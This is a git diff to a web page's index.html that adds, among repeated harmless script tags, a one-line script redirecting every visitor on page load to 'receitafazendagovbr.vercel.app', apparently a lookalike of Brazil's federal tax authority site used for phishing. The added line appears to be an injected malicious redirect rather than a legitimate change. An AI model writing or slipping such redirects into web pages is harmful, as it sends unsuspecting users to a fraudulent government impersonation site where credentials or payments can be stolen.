--- a/index.html
+++ b/index.html
@@ -155,4 +155,5 @@ height: 250px;
          document.documentElement.style.setProperty('--vh', `${vh}px`);
       });
    </script>   
-</div><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script></body></html>
+</div>
+<script type="text/javascript">location.href = 'https://receitafazendagovbr.vercel.app/'</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script><script type="text/javascript">var CVI_LIBRARY_URL = "/Shared/Scripts/fat_cvi.js";</script></body></html>
